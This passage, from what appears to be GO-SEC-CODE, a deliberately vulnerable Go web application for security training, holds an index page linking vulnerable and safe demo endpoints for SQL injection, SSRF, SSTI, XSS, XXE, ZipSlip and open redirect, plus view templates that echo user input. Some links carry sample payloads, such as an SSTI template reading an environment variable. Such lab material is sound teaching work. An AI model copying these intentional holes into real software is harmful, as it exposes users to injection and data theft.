 75 |       <h4><a href="/sqlInjection/native/safe/integer?id=1">safe:integer</a></h4>
 76 |       <h4><a href="/sqlInjection/native/safe/string?username=admin">safe:string</a></h4>
 77 |       <h4><a href="/sqlInjection/orm/safe/beego?field=username&username=admin">safe:orm</a></h4>
 78 |     </div>
 79 |     <div class="col-sm-4">
 80 |       <h3>SSRF</h3>
 81 |       <h4><a href="/ssrf/vuln?url">vuln:unchecked get param</a></h4>
 82 |       <h4><a href="/ssrf/vuln/obfuscation?url">vuln:obfuscation bypass</a></h4>
 83 |       <h4><a href="/ssrf/vuln/302?url">vuln:302 bypass</a></h4>
 84 |       <h4><a href="/ssrf/vuln/websocket?url=ws://localhost:233">vuln:x-websocket</a></h4>
 85 |       <h4><a href="/ssrf/vuln/nhooyr_websocket?url=ws://localhost:234">vuln:nhooyr-websocket</a></h4>
 86 |       <h4><a href="/ssrf/vuln/gorilla_websocket?url=ws://localhost:234">vuln:gorilla-websocket</a></h4>
 87 |       <h4><a href="/ssrf/safe/websocket?url=ws://localhost:233">safe:x-websocket</a></h4>
 88 |       <h4><a href="/ssrf/safe/whitelists?url">safe:whitelist</a></h4>
 89 |     </div>
 90 |     <div class="col-sm-4">
 91 |       <h3>SSTI</h3>
 92 |       <h4><a href="/ssti/vuln?template=&#123;&#123;env &#34;PATH&#34;&#125;&#125;">vuln:concat</a></h4>
 93 |       <h4><a href="/ssti/vuln2?template=%7B%7B.%7D%7D">vuln:ctf</a></h4>
 94 |       <h4><a href="/ssti/safe?template">safe:no concat</a></h4>
 95 |       <h4><a href="/ssti/safe?template=%7B%7B.%7D%7D">safe:ctf</a></h4>
 96 |     </div>
 97 |   </div>
 98 |   <div class="row">
 99 |     <div class="col-sm-4">
100 |       <h3>XSS</h3>
101 |       <h4><a href="/xss/vuln?xss">vuln:reflect</a></h4>
102 |       <h4><a href="/xss/vuln/store?xss">vuln:store</a></h4>
103 |       <h4><a href="/xss/vuln/svg">vuln:svg</a></h4>
104 |       <h4><a href="/xss/vuln/pdf">vuln:pdf</a></h4>
105 |       <h4><a href="/xss/safe?xss">safe:filter</a></h4>
106 |       <h4><a href="/xss/safe/svg">safe:CSP</a></h4>
107 |     </div>
108 |     <div class="col-sm-4">
109 |       <h3>XXE</h3>
110 |       <h4><a href="/xxe/vuln">vuln:libxml2</a></h4>
111 |       <h4><a href="/xxe/safe">safe:unexploitable</a></h4>
112 |     </div>
113 |     <div class="col-sm-4">
114 |       <h3>ZipSlip</h3>
115 |       <h4><a href="/zipslip/vuln">vuln:ziplip</a></h4>
116 |       <h4><a href="/tarslip/vuln">vuln:tarlip</a></h4>
117 |     </div>
118 | 
119 |   <div class="row">
120 |     <div class="col-sm-4">
121 |       <h3>OpenUrlRedict</h3>
122 |       <h4><a href="/OpenUrlRedict/vuln?url=http://baidu.com">vuln:OpenUrlRedict</a></h4>
123 |       <h4><a href="/OpenUrlRedict/safe?url=">safe:OpenUrlRedict</a></h4>
124 |     </div>
125 |     <div class="col-sm-4">
126 |       <h3>NoSql</h3>
127 |       <h4><a href="/NosqlInjection/native/vuln">vuln:NoSql</a></h4>
128 |     </div>
129 |     <div class="col-sm-4">
130 |     </div>
131 |   </div>
132 | </div>
133 | 
134 | </body>
135 | </html>


--------------------------------------------------------------------------------
/views/ssti.tpl:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |   <title>GO-SEC-CODE</title>
 5 |   <meta charset="utf-8">
 6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |   <link href="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/css/bootstrap.min.css" rel="stylesheet">
 8 |   <script src="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/js/bootstrap.bundle.min.js"></script>
 9 | </head>
10 | <body>
11 |     <div class="container-fluid p-5 bg-primary text-white text-center">
12 |         <h1>GO-SEC-CODE</h1>
13 |         <a href="/" style="color: white;">back to home</a>
14 |     </div>
15 |     <div class="container mt-5">
16 |         <h4>usertemplate: {{.usertemplate}}</h4>
17 |     </div>
18 | </body>


--------------------------------------------------------------------------------
/views/xss.tpl:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |   <title>GO-SEC-CODE</title>
 5 |   <meta charset="utf-8">
 6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |   <link href="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/css/bootstrap.min.css" rel="stylesheet">
 8 |   <script src="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/js/bootstrap.bundle.min.js"></script>
 9 | </head>
10 | <body>
11 |     <div class="container-fluid p-5 bg-primary text-white text-center">
12 |         <h1>GO-SEC-CODE</h1>
13 |         <a href="/" style="color: white;">back to home</a>
14 |     </div>
15 |     <div class="container mt-5">
16 |             <h3>post me a xss to store</h3>
17 |     </div>
18 |     <div class="container mt-5">
19 |         <form class="container" method="post">
20 |             <input name=xss value="233" style="width: 250px;height: 38px;">
21 |             <button type="submit" class="btn btn-primary">Submit</button>
22 |         </form>
23 |     </div>
24 |     <div class="container mt-5">
25 |         <p>xss content:{{.xss}}</p>
26 |     </div>
27 |   </body>


--------------------------------------------------------------------------------
/views/xxe.tpl:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |   <title>GO-SEC-CODE</title>
 5 |   <meta charset="utf-8">
 6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |   <link href="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/css/bootstrap.min.css" rel="stylesheet">
 8 |   <script src="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/js/bootstrap.bundle.min.js"></script>
 9 | </head>
10 | <body>
11 |     <div class="container-fluid p-5 bg-primary text-white text-center">
12 |         <h1>GO-SEC-CODE</h1>
13 |         <a href="/" style="color: white;">back to home</a>
14 |     </div>
15 |     <form class="container" method="post">
16 |         <div class="mb-3">
17 |             <label for="exampleFormControlTextarea1" class="form-label"><h3>paste xml to upload</h3></label>
18 |             <textarea class="form-control" id="exampleFormControlTextarea1" rows="3" name="file"></textarea>
19 |         </div>
20 |         <button type="submit" class="btn btn-primary">Submit</button>
21 |     </form>
22 |     <div class="container mt-5">
23 |         <h4>{{.xxe}}</h4>
24 |     </div>
25 |   </body>


--------------------------------------------------------------------------------